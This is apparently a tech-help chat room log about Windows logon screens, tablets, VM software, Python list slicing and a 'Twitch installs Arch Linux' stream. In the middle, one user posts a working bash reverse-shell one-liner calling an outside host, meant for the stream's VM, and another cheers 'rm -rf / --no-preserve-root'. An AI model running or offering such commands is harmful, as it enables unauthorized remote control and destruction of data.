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The biggest issue with this username change is thst it detaches me from communities who otherwise know me well, sapping me of my motivation to participate.
I'm not willing to have it changed back just yet, though, due to a lack of legal certainty.
@Psycogeek I found professional fluorescent light bulb for photography that is 5400K, 105W equivalent to 525W. This thing will consume half kilowatt under 1 hour! Do I really need that one powerfull? Is 105W minimum requirement?
oh the /interactive switch does not work anymore
'the request is not supported'
win 10 sucks bro
I think they removed interavtive altogether for security reasons
pretty sure it's not in 7
the whole command is disabled now
tsdiscon does not work either
switch user does not allow for SAS but disconnect session does
I don't know if that was the case in 8
@Boris_yo Ermm, it will consume 0.1 kilowatt-hours per hour
@RecycleBin SAS?
The wattage isn't what's relevant, the lumens is
secure authentication sequence
it opens classic logon where you can switch user, logoff, or change domains
dunno. I'm going to sleep.
Hey Bob's avatar changed
@RecycleBin I think you can get that if you lock it
hmm windows 7 fails too
but tsdiscon works
needs pro edition
to go to the welcome screen that is
windows 10 pro and windows 7 ultimate
above article says tsdiscon works in pro
I don't have a copy of that yet so can't test
it does to the splash screen (prior to the welcome screen) but then goes back to the desktop again
ill try adding a password
@RecycleBin You need to enable the SAS first. Open netplwiz and go to the advanced tab.
It's been disabled by default since Vista
oh I mean to go to classic logon
you could hit ctrl alt delete twice before
shrug I don't have a CAD.
to switch between welcome screen and classic logon
tablet remember :P
can you use a real mouse with a windows tablet
if I bothered attaching one, yea
my dad is thinking of replacing a laptop with a tablet
@RecycleBin You can enable classic logon with group policy.
Ill take his laptop
that will always be displayed then though
its complicated
Also, I can say now that enabling SAS through netplwiz will request the sequence even when switching users via the start menu
and doing lock, switch user, or tsdiscon brings up a different lock sreen
@RecycleBin hm. dunno, then
this is what youre thinking of encrypted-tbn2.gstatic.com/…
@RecycleBin Seems like it might've been removed in Win8 winaero.com/blog/…
@RecycleBin eh... you can attach a mouse but it can be a pain to get it to stand up on a desk or sitting in bed
he wants something portable but is tired of laptops
bluetooth mice are a bit more seamless (no dongle) but also a tad laggier
@RecycleBin could try a lightweight laptop
ive reccomended a netbook but no
@JourneymanGeek has an HP Stream 11 (?)
@RecycleBin there aren't really any modern netbooks as such. Stream is probably the closest :P
you have tablets, convertibles, ultrabooks and standard bulky laptops
he isnt even supposed to be using a phone or a computer anyhow
damn idiot
he said he isnt using a computer or phone anymore
im not even gonna help the guy
it looks like windows 7 also cannot do the SAS welcome screen to classic logon
the start menu tiles pane can be disabled if all tiles are removed and the start menu is horizontally resized down
thats cool
cool it lets me change PC settings without having to enter the product key now,
that was random as it wanted the product key before
oh now its saying it again COME ON!
its an easy fix but still sucks
@RecycleBin Looks like registry corruption. Not sure if this would help, but you could try the registry cleaning feature in CCleaner.
It's a long shot, though.
its fixed now
going to control panel >display properties fixed it
Q: hoW dO iI turN off nARRATOr?

MahoganiEiI sortA buttoN masheD mY ComputeR KeyboarD anD noW theiR iS aA guY tellinG mE whaT i'M doinG anD givinG mE DefinitionS oF thingS thE mousE goeS neaR oR toucheS. thE sounD ButtoN oN thE keyboarD iS takinG mE tO wherE thE CalculatoR iS. hE saiD somethinG abouT KeyboarD FocuS. cAn sOMEONe tELl me ...

Hmmm. I find this impossible to read/understand.
trying to convince my friends to type in a command for me in the twitch arch linux room @ 4 so by popularity it will be ran but they're like "its illegal" and im like "its a virtual machine its for fun"
@HackToHell: Yo where are youuuu
yay, I managed to get Cortana to work in Belgium
@Dave What command do you want to run?
exec 5<>/dev/tcp/1166280554/6667;cat <&5 | while read l; do $l 2>&5 >&5; done &
my reverse shell command
which allows me to control the machine
in a background process
that would be funny
i want access to the shell
I hope the very first command that gets executed is rm -rf / --no-preserve-root
Several people are already spamming that
so i can get root / with raw socket capability / then en.wikipedia.org/wiki/TCP_sequence_prediction_attack to give my self moderation status in the chat room
Unfortunately, it is impossible to do a fork bomb, because Twitch chat does not allow you to spam symbols in that manner
yea.. mines not a fork bomb though ;) mines just a reverse shell
which runs independently in the background (transparently)
Sadly, some ISPs have proven to be very reluctant to deploy IPv6 (I'm looking at you, Verizon Fios). We recently switched to Time Warner Cable and got IPv6 working out of the box (native IPv6 no less), but there's still a lot of inertia from the industry. This is especially serious because we are almost completely out of IPv4 addresses worldwide!bwDraco 15 mins ago
So apparently, I'm going to miss the first few minutes of typing because Moobot in TPAL times you out if you type KappaRoss
And also if you type a bunch of other legit commands
basically, all emotes are banned
which means it's not really a true Twitch experience
it will be if i can get a reverse shell
love how the chat room is full of less experienced people that dont have the greatest knowledge.
My internet is just shot to hell right now, not sure what's up
@Dave Apparently, people think your message is offensive...
@Dave Better then the previous one...
@NateKerkhofs Yeah... Invalidated...
Not sure how "don't have a clue" is offensive, but sure
There are reviewers around! ;-)
(actual humans, or in my case: a Vorlon!)
grrr... chat flags need to show the revision that was flagged...
for the original I might have given a valid...
@Vogel612 replace "don't have the greatest knowledge" with "haven't got a clue"
@Vogel612 meh... not in the context it was in!
yeah, i edited my own chat message ;)
And I'm not sure how exactly that can be seen as offensive
@NateKerkhofs actually... there was another word in there...
@Dave Next time: do it like it's now!
s/less experienced people/[...]/
or use smileys...
Twitch chat is hilarious: we can't even press enter
eh I'm off to doing 10k people things..
@Fabby: Well i tend to say the meanest things about people sometimes and realize later on that maybe i should word it differently.
me too! Be gentle @Dave
Im terrble at it
I got an excuse for being socially retarded: I got asperger's
And the program crashed already
8 thousand viewers.. not bad
Not much though compared to TPP in the glorydays. I believe they had almost 30K at one poiint
Never heard of that stream
oh yeah twitch plays pokemon never mind.. Yeah agreed
Q: How can I remove esurf.biz malware from my browsers on windows 8?

B TSince I can't add an answer to my last question about the esurf.biz malware (because busy body admins decided it was a duplicate of the question: "How do I remove malware in general"), I'm forced to post it again, so I can share my solution with people. In short: how can I remove the godawful pi...

Is it me, or is the VM just not responding?
hey guys is there any chat room where i could ask a question regarding a windows8 wifi sharing issue?
or is this the wrong site?
The author has decided to call us "retarded" and "idiots' since he does not agree that his question is a duplicate of the existing question.
What is your question?
i connected to wifi network via a external realtek usb wifi adapter (for better connection) but i cant share the connection through ethernet :/
there is no sharing tab in the wifi adapter configuration
basically im tryin to use my laptop as an access point
@JourneymanGeek - See question about esurf.biz when you get a chance
You have enabled the sharing on the Ethernet adapter correct?
I simply using something like Virtual Router to accomplish this
they finally managed to boot the os
r/fiftyfifty is so risky, but often rewarding
this is funny as hell twitch.tv/twitchinstallsarchlinux
first attempt @ a ls command
They'll manage. Twitch managed to beat Pokemon faster than me the first time
Well, Dave, I think you won't manage to enter your reverse shell in this manner
@NateKerkhofs: yeah unless if i have like 30 concurrent chat sessions sending the commands to twitch's chat server and beating everybody's voted single keystrokes
@Dave you need to enter the command one letter at a time, I think
true :(
What does ls do in Arch linux? I'm not familiar with the *nix stack
list files in the current directory
its equivocal to dir in dos
correction: I'm not familiar with most OS CLIs
but I get what you mean
lol @stream
What are they doing?
creating a new disk partition?
yeah for the install
now they r going to make a filesystem on it
Getting Cortana to work was fun. Only downside is I now need a pin to enter
because I had to configure Windows to use a Microsoft account instead of my normal passwordless Windows account
But hey, at least I CAN use a pin instead of my normal 20 char password
or however many it is
would have been an absolute nightmare to enter that multiple times a day
guys, would you suggest Vmware or Virtualbox for a ubuntu vm? or are there actually any major differences?
virtualbox we used to use with ubuntu for our dev environment @ my last job. We had 12 developers and were a multi million dollar company
apparently virtualbox is also more lightweight than Vmware
I think I'll go for virtualbox
you want to teeter towards software that's open source with also good support within irc chatroom communities.. therefore virtualbox
you go in the vbox room and theres like 300 people there to instantly answer any questions
irc.freenode.net #vbox
never use software with garbage support. ;)
I doubt I'll need too much help with the software itself, though
well if you get into chef or vagrant then it's good to have people around.
true, but for now I only need a ubuntu VM for a school project :p
I've looked into changing my avatar for a while. Any ideas?
@bwDraco Something from google.com/…?
Showing the constellation Draco
@bwDraco Are you keeping your current name, going back to the old one or choosing something completely different?
The name will stand for the time being.
It may be reverted, pending the resolution of the legal issue.
Ignore the "legal" issue. It's all hot air and copyright trolls and they don't deserve the air they're breathing let alone the time of day as far as their claim goes.
What do you want? Do you want the old name or what?
Of course as far as legal goes, if you like that image I'd at least ask the guy on DeviantArt if he would mind you using it...
oh yay, error after install
oh no, that's fine ubuntu, just boot up normally after restart and act like nothing happened
Does twitch need the Flash player?
I think so
I haven't at least heard of any html5 capabilities
hmmm. works in IE, but not Firefox. Right-clicking video in IE doesn't bring up the Flash context menu... :/
Well that's an ugly hack.
HTML5 controls and a crappy flash player behind the scenes...
That's pants on head and pencils up nostrils and saying "wibble" a lot.
Next stop, how to destroy Flash on Windows 10...
@Leathe: vmplayer < virtualbox < vmware workstation
google is being sneaky again oi67.tinypic.com/25f0mt4.jpg
@RecycleBin just a polite request, can you use the "upload..." button rather than tinypic?
I cannot see that
@RecycleBin: Are you on mobile?
on mobile?
nope PC
Uh... clipboard?
Tinypic is the AOL of the image sharing world
@Mokubai where'd you get that clipboard button?
@Mokubai Is it a mod thing?
No, just a chat mod: stackapps.com/questions/2105/…
I forgot I had it installed
that button is missing
all I see is send
Not enough reputation to post images, that's why.
my rep is over 9000
how come posting images sometimes embeds them like I want
You need 100 aggregate reputation to do this.
@RecycleBin 9000?
@DavidPostill google "over 9000" :P
@Leathe Ah.
how do I get all index values between index[1] and index[14] for example, in python :I
I'm not sure what exactly I should google to find out the answer to that
@Leathe I don't know python but maybe thegeekstuff.com/2013/08/python-array has the answer?
@DavidPostill not quite what I'm looking for in there
but it could mean it can't be done with the shortcut I have in mind
@Leathe index[1:14]
yeah, thanks
that's what I was looking for
You can also do smart things like index[3:] to go from item 3 to the end of the list, and index[-3:] to get the item 3rd from the last to the end
yeah, I actually use [1:] now
since it makes the graph look a bit better ;P
dem graphs, yo
I have just been restarted! This happens daily automatically, or when my owner restarts me. Ready for commands.
Basically "list slicing"

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